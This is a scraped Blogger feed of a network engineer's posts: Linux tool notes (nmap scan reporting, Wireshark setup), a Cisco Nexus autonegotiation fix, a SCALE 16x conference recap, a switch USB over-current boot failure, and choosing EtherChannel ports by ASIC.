<host><port><level><br />sudo add-apt-repository ppa:i-nex-development-team/daily<br />sudo add-apt-repository ppa:gambas-team/gambas3<br />sudo apt-get update<br />sudo apt-get install i-nex<br /><br />********************************************************<br />sudo apt install sendip<br />SendIP is a command-line tool to send arbitrary IP packets. <br />http://www.ubuntugeek.com/sendip-tool-to-send-arbitrary-ip-packets.html<br /><br />********************************************************<br />nmap scan report tool<br />https://blog.techorganic.com/2012/09/15/parsing-nmaps-output/<br />https://github.com/superkojiman/scanreport<br />https://github.com/superkojiman/onetwopunch<br /><br />Example<br />cat targets.txt <br />192.168.81.171<br />192.168.81.182<br />192.168.81.143<br />192.168.81.119<br />192.168.81.190<br /><br />nmap -sV -oG scan.txt -iL targets.txt <br />remove # from report<br />grep -v ^# scan.txt > report.txt<br /><br />scanreport.sh -f report.txt <br />Host: 192.168.81.171 () <br />22 open tcp ssh OpenSSH 5.3p1 Debian 3ubuntu4 (protocol 2.0) <br />80 open tcp http Apache httpd 2.2.14 ((Ubuntu)) <br /> <br />Host: 192.168.81.182 () <br />22 open tcp ssh OpenSSH 5.3p1 Debian 3ubuntu4 (protocol 2.0) <br />80 open tcp http Apache httpd 2.2.14 ((Ubuntu)) <br />443 open tcp ssl|http Apache httpd 2.2.14 ((Ubuntu)) <br /><br />*************************************************************<br />Angry IP <br />http://angryip.org/download/#linux<br />dpkg -s ipscan_3.5.2_amd64.deb<br /><br />**************************************************************<br />An extremely handy tool :: Incremental history searching<br />In terminal enter:<br />gedit ~/.inputrc<br />Then copy paste and save:<br />"\e[A": history-search-backward<br />"\e[B": history-search-forward<br />"\e[C": forward-char<br />"\e[D": backward-char<br /><br />From now on, and many agree this is the most useful terminal tool, it saves you a <br />lot of writing/memorizing...<br /><br />All you need to do to find a previous command is to enter say the first two or three letters and upward arrow will take you there quickly:<br /><br />Say I want:<br /><br />for f in *.mid ; do timidity "$f"; done<br />All I need to do is enter:<br /><br />fo<br />And hit upward arrow command will soon appear.<br /><br />*************************************************************************<br />Wireshark<br />On Ubuntu<br />sudo apt-get install wireshark libcap2-bin<br />sudo groupadd wireshark<br />sudo usermod -a -G wireshark $USER<br />sudo chgrp wireshark /usr/bin/dumpcap<br />sudo chmod 755 /usr/bin/dumpcap<br />sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap<br />(step 6 to make the interfaces visible)<br /><br />*************************************************************************<br />Go language<br />sudo apt install golang-go<br /><br />gotop - Another tool like htop<br />https://github.com/cjbassi/gotop<br /><br />/home/mhubbard/bin/gotop<br />└─> $ ./gotop<br />************************************************************************<br />sudo apt-get install libncurses5-dev libncursesw5-dev<br />sudo apt install ncdu - an ncurses disk file display tool<br /><br />************************************************************************<br />nmap 7.70<br />https://nmap.org/download.html<br /><br />bzip2 -cd nmap-7.70.tar.bz2 | tar xvf -<br />cd nmap-7.70<br />./configure<br />make<br />sudo passwd root<br />Enter a strong password for the root user<br />sudo passwd -u root<br />to unlock the account<br />su root<br />make install<br />exit - logout as root<br /><br />disable root account<br />sudo passwd -l root<br /><br />Install HD Moore's banner-plus script<br />https://github.com/hdm/scan-tools/blob/master/nse/banner-plus.nse<br /><br />*********************************************************</level></port></host><br />
<host><port><level><br /></level></port></host> References<br />
<a href="https://www.maketecheasier.com/8-ways-to-maintain-a-clean-lean-ubuntu-machine/" target="_blank">8 Ways to Maintain a Clean, Lean Ubuntu Machine</a><br />
<a href="http://www.linuxandubuntu.com/home/how-to-make-gedit-more-programmer-friendly" target="_blank">How To Make Gedit More Programmer Friendly</a><br />
<br />
<br /></div>
</div>
</div>
</div>
</div>
</div>
@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-3391759698755358382018-04-10T21:57:00.000-07:002018-04-10T21:57:14.584-07:00Nexus 9K %ETHPORT-5-IF_DOWN_LINK_FAILURE when connected to a device with fixed speedI connected an HP C7000 On Board Administrator to a Cisco Nexus 93108 switch and the port wouldn't come up. Nothing at all happened actually, no link light, no log entry, nothing.<br />
<br />
The OBA was configured for 100Full and I configured the Nexus like this:<br />
interface Ethernet1/38<br />
switchport access vlan 238<br />
speed 100<br />
duplex full<br />
logging event port link-status<br />
<br />
The OBAs are hot-swappable, if I pulled it out, waited a couple seconds and then reseated it, the link would come up briefly and then go down. The following messages were displayed:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">2018 Apr 10 12:25:41 TEST-93108TC %ETHPORT-5-SPEED: Interface Ethernet1/38, operational speed changed to <span style="color: red;">100 Mbps</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">2018 Apr 10 12:25:41 TEST-93108TC %ETHPORT-5-IF_DUPLEX: </span><span style="font-family: "Courier New", Courier, monospace; font-size: xx-small;">Interface Ethernet1/38, operational duplex mode changed to </span><span style="color: red; font-family: "Courier New", Courier, monospace; font-size: xx-small;">Full</span><br />
<span style="font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">2018 Apr 10 <span style="color: red;">12:25:41</span> TEST-93108TC %ETHPORT-5-IF_UP: Interface Ethernet1/38 is up in mode access</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">2018 Apr 10 <span style="color: red;">12:26:03</span> TEST-93108TC %ETHPORT-5-IF_DOWN_LINK_FAILURE: Interface Ethernet1/38 is down (Link failure)</span><br />
<br />
You can see that the link would come up, set to 100Full and then go down within 30 seconds.<br />
<br />
<h3>
The solution</h3>
It turns out that setting the port using "speed 100" or "speed 1000" and duplex full doesn't disable negotiation. You need to enter:<br />
<br />
no negotiation auto<br />
<br />
in the configuration of the port.<br />
interface Ethernet1/38<br />
switchport access vlan 238<br />
speed 100<br />
duplex full<br />
no negotiation auto<br />
logging event port link-status<br />
<div>
<br /></div>
<div>
The other option was to get credentials for the OBA and set it to auto. Once I did that and removed the no negotiation auto the port came up at 1000 full and stayed up.</div>
<div>
<br /></div>
<div>
<div>
interface Ethernet1/38</div>
<div>
switchport access vlan 238</div>
<div>
logging event port link-status</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">2018 Apr 10 12:27:16 TEST-93108TC %ETHPORT-5-SPEED: Interface Ethernet1/38, operational speed changed to <span style="color: red;">1 Gbps</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">2018 Apr 10 12:27:16 TEST-93108TC %ETHPORT-5-IF_DUPLEX: Interface Ethernet1/38, operational duplex mode changed to <span style="color: red;">Full</span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">2018 Apr 10 12:27:16 TEST-93108TC %ETHPORT-5-IF_UP: Interface Ethernet1/38 is up in mode access</span></div>
</div>
<div>
<br /></div>
<br />@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-5841668154701190702018-03-11T23:42:00.001-07:002018-03-25T16:07:10.023-07:00Southern California Linux Expo Scale 16xI took a vacation day Friday and made it a three-day trip to SCALE 16x. I'm glad I did because I got to attend six sessions on Friday, talk about drinking from the fire hose! Unfortunately, I was too tired to go the after party. I didn't even make it to the keynote speeches!<br />
<br />
I ran into Noah and Chris from Jupiter Broadcasting Friday night before my last session. At Scale 14x they had a contest called "Noah switched me to Linux" where they teamed up with System76 to switch as many people as possible from Windows to Linux. I didn't buy my System76 Gazelle at Scale 14x but Noah did convince me to switch by that Summer.<br />
<br />
<h3>
Friday, March 9th, 2018</h3>
<br />
<b>Linux Professional Institute</b><br />
I didn't notice that the Linux Professional Institute was going to be offering certification exams at scale for half price until last week so I couldn't cram enough for the LPIC exams but I did attend their two cram sessions on Friday.<br />
<br />
They were great, one was led by a Linux Academy instructor and it definitely convinced me to sign up for the Linux Academy. After attending both sessions I decided to take the Linux Essentials exam Sunday morning. Since it was a paper exam I won't get the results for thirty days. Unlikely that I passed given just a couple days to prepare but I glad I tried! They were the friendliest group of people I have ever met at an exam center.<br />
<br />
<b>Update</b> - March 21, 2018 - it didn't take 30 days for them to let me know I passed! You can verify the certification from this <a href="http://lpi.org/v/LPI000397493/g4qp2sswuc" target="_blank">link</a>.<br />
<br />
<b>It's Embedded into the plan!</b><br />
Somehow I got on the embedded Linux Engineer track this year! It started out with a session on U-Boot - Implementing state of the art U-Boot port. U-boot is a development tool that creates the Device Tree that embedded devices use to boot. I didn't get everything he was talking about but luckily when I got to the hands on class Saturday it all became clear.<br />
<br />
<b>It's about time!</b><br />
Next on the embedded track, I sat in on Frederico Lucifedi's session - Hardware Hacking 101 Time and Randomness. Frederico is a Red Hat employee in the storage group but he does a lot of hardware hacking. In this session he used a USB GPS and the NTP daemon to create a very accurate time server that doesn't rely on an Internet timeserver.<br />
<br />
I have one of the GPS devices that he used (Globstat BU 353) and I'm anxious to duplicate the setup. I purchased it for a cruise to Bonaire and used Foxtrot open source software to map the trip. There is a link to a youtube video on wardriving in the reference section.<br />
<br />
Next, he showed us a <a href="https://www.sparkfun.com/products/retired/11345" target="_blank">SparkFun Geiger Counter</a> project that creates true randomness. It doesn't create a lot of entropy so you will have to feed the output to a pseudo-random number generator but it was a great demo.<br />
<br />
<b>Badgelife</b><br />
I had heard about "electronic badges" at Defcon but hadn't paid much attention. The guy behind the "Mr. Robot" Defcon badge opened up the Badgelife session. It is very impressive how much time and effort they put into these things.<br />
<br />
This session was more of a social gathering and they provided booze and snacks and a good time. I met a few interesting people including an Oracle DBA. We had a good time exchanging war stories. I guess it is true, DBAs are people too.<br />
<br />
<b>Facebook Switching</b><br />
I didn't get much time at the expo because of all the sessions but I did get to see one of the Facebook white box switches. It uses a Broadcom Tomahawk II to provide 16 ports of 100G Ethernet. I was told that the OS was CentOS 6. I asked how they managed the switching engine and the reply was that in the datacenter the don't do L2, only L3 and CentOS 6 handles it. They also told me that they have a Tomahawk 3 based switch with 32 100G ports in production. Here is a <a href="http://packetpushers.net/podcast/briefings-in-brief/bib-20-bib-20-broadcom-tomahawk-3-announced-32x400g-ports/" target="_blank">Network Break podcast on the Tomahawk 3</a><br />
<br />
<h3>
Saturday, March 10th, 2018</h3>
Luckily, my Beagleboard PocketBeagle came in on Thursday so I had the hardware for the Buldroot class. A friend of mine came to this session and it was great to have a partner. Neither one of us had ever done any embedded Linux devices and it was a cool experience.<br />
<br />
On the first try, I ejected my SD card without dismounting it and corrupted the boot partition. I didn't have serial connectivity to the PocketBeagle so it was hard to figure out what was happening. Luckily the instructor loaned me his "Cape" which had a serial UART and then I could see the "Unable to read" message. A quick reflash, a dismount and my first embedded Linux device was up and running!<br />
<br />
The Buildroot tool has a lot of packages that you can build in and I added Dropbear SSH and an HTTP server. Pretty cool for my first project! Now my mind is spinning with ideas of what to do next with my PocketBeagle.<br />
<br />
One thing I noticed was that a lot of the other people in the class were on Macbooks running Ubuntu as a VM. It was taking them 30-45 minutes to build the image. On my system76 Gazelle run Ubuntu on hardware it was around 10 minutes. And it was fun watching them whine about how long it was taking. The Macbooks are nice and I love mine but they are definitely not state of the art performance.<br />
<br />
<b>DNS Security</b><br />
The session on DNSSEC, DNS DANE and DNScrypt was great. I didn't realize that OpenDNS supports the DNScrypt protocol and that the DNScrypt project has been re-born as DNSCrypt-Proxy with a lot more capability. It's hard to believe that in 2018 most of us are still using DNS without encryption and authentication. But then again, it's hard to believe we are still using a username/password for authentication.<br />
<br />
<b>Git R done!</b><br />
The Git like a Pro session was standing room only the entire session! I learned a lot about git in a short time. I am anxious to take the Linux Academy course on Git. A friend of my put the bug in my ear last month about using Git for version control of network device configuration. I already have most customers set up with nightly backups to a share on the network. It would only take installing Git locally and some Python scripting to automate a commit and that would be pretty cool.<br />
<br />
<h3>
Sunday, March 11th, 2018</h3>
The Daylight savings time change came at the worst time for me! Losing an hour of sleep the morning I was going to take a cert exam at 09:00 didn't help. I exam was well thought out and well run but I will be very surprised if I passed. I can't wait to find out.<br />
<br />
<b>Another Badgelife session</b><br />
This one focused on the process of getting a badge designed, manufactured and delivered in time and at a cost low enough to sell. It was very interesting. The guy giving the talk is the owner of <a href="http://canbushack.com/" target="_blank">canbushack.com</a> and had a lot of great knowledge of automotive Ethernet and the new protocols.<br />
<br />
If you don't have a code reader or have never done any ODBC stuff you should check it out. You can find some really good code reader videos on Youtube.com and the cost for a decent reader is well under $100 now.<br />
<br />
I had a check engine light on my Ducati a while back and didn't want to take it to the dealer. A quick search on the Ducati.ms site and I found an ODBC interface for around $35.00 and an open source program to read the ECU!<br />
<br />
I bought some new remotes for my Tundra recently and the dealer wanted a ton of money to program them. I bought a USB to ODBCII cable on ebay for $15 and found the software I needed on Amazon. A few minutes later and Bob was my uncle.<br />
<br />
<b>Crypto: It's just math</b><br />
This session was exactly what the description said it would be. I was hoping it would be more practical application of PKI but it was still very good. At least I now understand why you do Elliptic curve crypto in a finite field. There are links to the presentation and other crypto documentation in the references.<br />
<br />
<br />
References:<br />
<a href="https://www.socallinuxexpo.org/scale/16x/schedule/friday" target="_blank">Scale 16x Schedule</a><br />
<a href="https://www.youtube.com/watch?v=fSsTgazmHCw&feature=youtu.be" target="_blank">WIGLE Like You Mean It Maximizing Your Wardriving</a><br />
<a href="https://slides.elijahcaine.me/crypto/#34" target="_blank">Crypto: Math slides</a><br />
<a href="https://goo.gl/zaRGBo" target="_blank">A primer on elliptic curve cryptography</a><br />
<a href="https://www.lpi.org/our-certifications/getting-started" target="_blank">Linux Professional Institute</a><br />
<a href="https://www.sans.org/reading-room/whitepapers/threats/hacking-bus-basic-manipulation-modern-automobile-through-bus-reverse-engineering-37825" target="_blank">Hacking the CAN Bus: Basic Manipulation of a Modern Automobile Through CAN Bus</a><br />
<a href="https://www.seeedstudio.com/CAN-BUS-Shield-V2-p-2921.html" target="_blank">Seeed Can Bus Shield for Arduino</a><br />
<a href="http://www.instructables.com/id/Hack-your-vehicle-CAN-BUS-with-Arduino-and-Seeed-C/" target="_blank">HACK YOUR VEHICLE CAN-BUS WITH ARDUINO AND SEEED CAN-BUS SHIELD</a><br />
<br />
<br />
<br />@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-69000930654038076182018-02-17T22:24:00.000-08:002018-02-17T22:39:52.021-08:00Don't charge your Airconsole (or mobile phone) on your switch's USB port!I use an <a href="https://www.get-console.com/shop/en/27-airconsole" target="_blank">Airconsole</a> to connect to switch console ports most of the time so that I can go sit at my portable table instead of standing on a ladder. It's a lot safer and more comfortable, especially when the switch is in a cabinet 10 or 12 feet up.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikLx7N1gkoFiBmV3_Zdg3cZ8h_VMGUHxFSCPpXsxdycz541WIahfgboY6aSgB7qdTqp09xc2_3BfsQccL0GKH9Q1eH7vT988Xbwl4tVoUj1-8Oz70QR1LXnsE96geWLa_yvdq082mm9K75/s1600/airconsole-standard-20.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="134" data-original-width="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikLx7N1gkoFiBmV3_Zdg3cZ8h_VMGUHxFSCPpXsxdycz541WIahfgboY6aSgB7qdTqp09xc2_3BfsQccL0GKH9Q1eH7vT988Xbwl4tVoUj1-8Oz70QR1LXnsE96geWLa_yvdq082mm9K75/s1600/airconsole-standard-20.jpg" /></a></div>
<br />
The Airconsole is charged using a USB micro port so I carry a short USB-A to USB-micro cable and plug it into the switch's USB port if it has one. I have been doing this a long time and never had an issue.<br />
<br />
Last night I was working on a Cisco 4500-x switch and connected my Airconsole to the USB port. I was connected for a couple hours working on the initial configuration and testing without any issues. Then I did a "write mem" and removed the power cords so that they could be routed and dressed into the rack.<br />
<br />
When the switch was powered back up it wouldn't boot and rapidly displayed this error message on the Airconsole over and over without ever continuing to boot:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Feb 16 18:50:47 %IOSXE-3-PLATFORM: process kernel: [ 77.606565] hub 1-0:1.0: over-current change on port 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Feb 16 18:50:47 %IOSXE-3-PLATFORM: process kernel: [ 77.710565] hub 1-0:1.0: over-current change on port 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Feb 16 18:50:47 %IOSXE-3-PLATFORM: process kernel: [ 77.814564] hub 1-0:1.0: over-current change on port 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Feb 16 18:50:47 %IOSXE-3-PLATFORM: process kernel: [ 77.918564] hub 1-0:1.0: over-current change on port 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Feb 16 18:50:47 %IOSXE-3-PLATFORM: process kernel: [ 78.022564] hub 1-0:1.0: over-current change on port 1</span><br />
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;">Feb 16 18:50:47 %IOSXE-3-PLATFORM: process kernel: [ 78.126564] hub 1-0:1.0: over-current change on port 1</span><br />
<br />
<span style="font-family: inherit;">I had added a third party DAC cable to switchport 1 right before I powered down and thought it was referring to switchport 1 so removed the DAC cable but it didn't make any difference. Then I noticed that the Airconsole charge LED was flashing at the same rate as the error messages. I removed the USB cable from the switch and it booted normally!</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisdgh5beYDMP8Hs2po4X3WDXlHwsm1cdU1HA3w132WqONC5RsD0cJC7iGTaCKmHlK4H0pDtbq0xXIp56u1dHnFLHhDFSb_8Iys0inGvoPvQvSN1chht3mD2mupXd35bTK_nVpt7lCZYA9R/s1600/Splitter.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="355" data-original-width="509" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisdgh5beYDMP8Hs2po4X3WDXlHwsm1cdU1HA3w132WqONC5RsD0cJC7iGTaCKmHlK4H0pDtbq0xXIp56u1dHnFLHhDFSb_8Iys0inGvoPvQvSN1chht3mD2mupXd35bTK_nVpt7lCZYA9R/s320/Splitter.jpg" width="320" /></a></div>
<span style="font-family: inherit;"><br /></span> Recently I purchased a Micro USB 4 Active POE <b><i>"</i></b><i><b>Splitter Power Over Ethernet 48V to 5V 2.4A Raspberry Pi"</b></i> on ebay (Amazon sells the same device for about the same cost).<br />
<br />
I use it on switches with PoE instead of the USB cable but the 4500-x is fiber only. But, I carry some longer patch cables with me so I could have charged off a 2960-x PoE+ port and still been able to reach the 4500-x.<br />
<br />
This splitter has a micro USB connector on it and an RJ45 male so you can put it inline if there aren't any open ports available.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I also bought one with a barrel connector to power my <a href="https://ameridroid.com/products/odroid-xu4" target="_blank">Odroid XU4</a> Kali box. Make sure you purchase the one with the micro-USB connector.@rikosintiehttp://www.blogger.com/profile/12290070565813241791noreply@blogger.com0tag:blogger.com,1999:blog-690329124282786689.post-33013409562972888392018-01-28T22:28:00.001-08:002018-02-13T13:08:58.623-08:00Cisco Switches -- What ports should you use for Port Channels based on port ASIC Assignments<span style="font-family: "courier new" , "courier" , monospace;">Cisco uses chips called Application Specific Integrated Chips (ASIC) in its switch ports. An ASIC is the "Secret Sauce" that allows the switch to operate at line speed.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">The number of switch ports controlled by one ASIC varies depending on the platform. The 6880-x uses one ASIC for every 8 ten Gigabit ports. </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">A 1 Gigabit switch like a 2960x-48 uses two ASICs for all 50 ports. Ports g1/0/1-24 and port t1/0/1 are on ASIC 0 and Ports g1/0/25-48 and t1/0/2 are on ASIC 1.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">On the 6880-x switch you can use the following command to see what ASICs a port uses:</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;"><b><i>sh int t1/5/1 capabilities | i ASIC</i></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> Ports-in-ASIC (Sub-port ASIC) : 1-2,5-6 (1-8)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><i>sh int t1/5/3 capabilities | i ASIC</i></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> Ports-in-ASIC (Sub-port ASIC) : 3-4,7-8 (1-8)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><i>sh int t1/5/11 capabilities | i ASIC</i></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"> Ports-in-ASIC (Sub-port ASIC) : 11-12,15-16 (9-16) </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">In this example, port 1/5/1 is part of the ASIC in group 1. See <a href="https://ciscointerworking.wordpress.com/2015/06/14/asic-redundancy/" target="_blank">Cisco ASIC Redundancy</a> for a complete explanation of how the ASICs are grouped in a 6880-x switch.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">The above output represents the channel mapping and the port to ASIC mapping of the interfaces. For example, Te1/5/1 shares the fabric with ports 2,5,6 (1-2,5-6) and the port-asic with ports 2-8 (1-8).</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">You can use "sh hw-module slot 5 port-group-mapping" to view the ASIC mappings.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <b><i><span style="font-family: "courier new" , "courier" , monospace;">sh </span>hw<span style="font-family: "courier new" , "courier" , monospace;">-module slot 5 port-group-mapping</span></i></b><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">port-group ports</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">1 1, 2, 3, 4, 5, 6, 7, 8,</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">2 9, 10, 11, 12, 13, 14, 15, 16,</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<h3>
<span style="font-family: "courier new" , "courier" , monospace;">Why does this matter?</span></h3>
<span style="font-family: "courier new" , "courier" , monospace;">In a switch, it is possible for one ASIC to fail while the other ASICs continues to work. If you have created an Etherchannel for redundancy but used ports on the same ASIC you will have an outage if the ASIC fails. </span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">A better design is to use Ethercannel ports on different ASICs. It can be a pain to keep track of the ports for each Etherchannel when doing this. To reduce the pain I have a spreadsheet on Github that will create the port configuration and the interface configuration. All you have to do is enter the ports. You can download the spreadsheet from my github at <a href="https://github.com/rikosintie/Documents" target="_blank">Documents</a></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">I</span><span style="font-family: "courier new" , "courier" , monospace;">f you are using a different platform you will have to lookup the ASIC groupings for that specific</span><span style="font-family: "courier new" , "courier" , monospace;"> platform.</span><span style="font-family: "courier new" , "courier" , monospace;"> For example, a Nexus 7K uses 4 port ASIC groupings.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">On the 3750/2960 series switches, you use the "show platform pm if-numbers" command </span><span style="font-family: "courier new" , "courier" , monospace;">to display platform-dependent port-manager information.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">In this example from a 2960x-48, the first number in the ports column is the ASIC that it falls on. There are only two ASICs across all 52 ports.</span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><b><i>sh platform pm if-numbers </i></b></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span> <span style="font-family: "courier new" , "courier" , monospace;">interface gid gpn lpn <span style="color: red;">port</span> slot unit slun port-type lpn-idb gpn-idb</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">----------------------------------------------------------------------</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/1 1 1 1 0/2 1 1 1 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/2 2 2 2 0/1 1 2 2 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/3 3 3 3 0/4 1 3 3 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/4 4 4 4 0/3 1 4 4 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/5 5 5 5 0/6 1 5 5 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/6 6 6 6 0/5 1 6 6 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/7 7 7 7 0/8 1 7 7 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/8 8 8 8 0/7 1 8 8 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/9 9 9 9 0/10 1 9 9 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/10 10 10 10 0/9 1 10 10 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/11 11 11 11 0/12 1 11 11 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/12 12 12 12 0/11 1 12 12 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/13 13 13 13 0/16 1 13 13 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/14 14 14 14 0/15 1 14 14 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/15 15 15 15 0/18 1 15 15 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/16 16 16 16 0/17 1 16 16 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/17 17 17 17 0/20 1 17 17 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/18 18 18 18 0/19 1 18 18 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/19 19 19 19 0/22 1 19 19 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/20 20 20 20 0/21 1 20 20 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/21 21 21 21 0/24 1 21 21 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/22 22 22 22 0/23 1 22 22 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/23 23 23 23 0/26 1 23 23 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/24 24 24 24 0/25 1 24 24 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/25 25 25 25 1/2 1 25 25 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/26 26 26 26 1/1 1 26 26 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/27 27 27 27 1/4 1 27 27 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/28 28 28 28 1/3 1 28 28 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/29 29 29 29 1/6 1 29 29 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/30 30 30 30 1/5 1 30 30 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/31 31 31 31 1/8 1 31 31 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/32 32 32 32 1/7 1 32 32 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/33 33 33 33 1/10 1 33 33 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/34 34 34 34 1/9 1 34 34 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/35 35 35 35 1/12 1 35 35 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/36 36 36 36 1/11 1 36 36 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/37 37 37 37 1/16 1 37 37 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/38 38 38 38 1/15 1 38 38 local Yes Yes</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">Gi1/0/39 39 39 39 1/18 1 39 39 local Yes Yes</span><br />
